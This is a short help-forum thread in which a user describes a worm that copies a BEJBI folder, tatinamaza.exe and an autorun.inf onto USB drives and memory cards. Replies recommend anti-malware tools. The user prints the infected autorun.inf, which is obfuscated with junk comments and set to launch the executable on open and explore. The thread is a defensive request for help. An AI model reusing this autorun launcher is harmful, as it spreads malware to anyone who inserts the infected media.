BEJBI Virus

  • dark_lord
  • Graduate
  • Graduate
  • User avatar
  • Posts: 162
  • Loc: India-Kolkata

Post 3+ Months Ago

well stuck with an innocent virus

The virus is not doing anything at all. But it is getting copied to pen drive and other removable media like my mobile phone memory card too.

The two thing which are getting copied are BEJBI folder (system folder, read only of course) and autorun.inf file

Inside BEJBI folder I've have got tatinamaza.exe file (system of course :D)

Since it is not doing anything unusual to my computer process or something like that, i can not catch it. Wasted 2-3 hours. So anyone knows anything which can help me out? Google could not help me till this time. Norton and spybot failed probably. Or maybe for them, the virus is still innocent but i don't want others to suffer when i put my pen drive to my friend's house

Now I'm trying with hijackthis thing, pretty new to me, cause at college i used to delete the viruses manually by looking into processes and unusual responses from computer

my computer running XP Professional media center, XP service pack 3, Fedora.
Anyways The autorun.inf looks like this

Code: [ Select ]
P:\>type autorun.inf
[autorun
;╔}?J??╪≡m??┌∞Xδ??_vFQh?<??∙'²?·,?Ctb╥e??▄Nt?d?!?s?.[?cC?φ╟═?▄╪?s╪?sδα∙≤δα╙;°α4α
4└???▌f??▄Θw╪!?MrI?∙²?y??????∙?δ|?τ?┴╦;└┘;εα°ε3α,;α34αΓ34▌Mmr?N?}α·???Z(J?N?/??\
═µd??╨????Φ?ΦT?≡²?I_J??▄·?L▄
;LF:4klfKF$:KOfF$?F$KfO:$kjf4
open=BEJBI///tatinamaza.exe
;#Jfrikj34ilf43JF$#
icon=%SystemRoot%\system32\SHELL32.dll,4
;JF$I#JF4imkjf$L:JF$:f4
action=Open folderáto view files usingáWindowsáExplorer
;j$FIFDI#DJ$KJF#$:F#$K<g
Shell\open\\\command=BEJBI///tatinamaza.exe
;g43g43
shell\explore\\command=BEJBI///tatinamaza.exe
;KG#$(OUIG$(#IG34
USEAUTOPLAY=1
:AH WHAT CAN I SAY
  1. P:\>type autorun.inf
  2. [autorun
  3. ;╔}?J??╪≡m??┌∞Xδ??_vFQh?<??∙'²?·,?Ctb╥e??▄Nt?d?!?s?.[?cC?φ╟═?▄╪?s╪?sδα∙≤δα╙;°α4α
  4. 4└???▌f??▄Θw╪!?MrI?∙²?y??????∙?δ|?τ?┴╦;└┘;εα°ε3α,;α34αΓ34▌Mmr?N?}α·???Z(J?N?/??\
  5. ═µd??╨????Φ?ΦT?≡²?I_J??▄·?L▄
  6. ;LF:4klfKF$:KOfF$?F$KfO:$kjf4
  7. open=BEJBI///tatinamaza.exe
  8. ;#Jfrikj34ilf43JF$#
  9. icon=%SystemRoot%\system32\SHELL32.dll,4
  10. ;JF$I#JF4imkjf$L:JF$:f4
  11. action=Open folderáto view files usingáWindowsáExplorer
  12. ;j$FIFDI#DJ$KJF#$:F#$K<g
  13. Shell\open\\\command=BEJBI///tatinamaza.exe
  14. ;g43g43
  15. shell\explore\\command=BEJBI///tatinamaza.exe
  16. ;KG#$(OUIG$(#IG34
  17. USEAUTOPLAY=1
  18. :AH WHAT CAN I SAY
  • Anonymous
  • Bot
  • No Avatar
  • Posts: ?
  • Loc: Ozzuland
  • Status: Online

Post 3+ Months Ago

  • Don2007
  • Web Master
  • Web Master
  • Don2007
  • Posts: 4924
  • Loc: NY

Post 3+ Months Ago

Download, update & run anti malware from malwarebytes.org
If that doesn't stop it, post the hijack this log.
  • dark_lord
  • Graduate
  • Graduate
  • User avatar
  • Posts: 162
  • Loc: India-Kolkata

Post 3+ Months Ago

I have formatted my pen drive and memory drive. Seems that worked. I think the virus was on my pen drive and memory card and not on the computer. If i find any other trouble from that virus, i will surely post the hijackthis log.

I will try that malwarebytes.org too

Thanks anyway.

Post Information

  • Total Posts in this topic: 3 posts
  • Users browsing this forum: No registered users and 68 guests
  • You cannot post new topics in this forum
  • You cannot reply to topics in this forum
  • You cannot edit your posts in this forum
  • You cannot delete your posts in this forum
  • You cannot post attachments in this forum
 
 

© 1998-2014. Ozzu® is a registered trademark of Unmelted, LLC.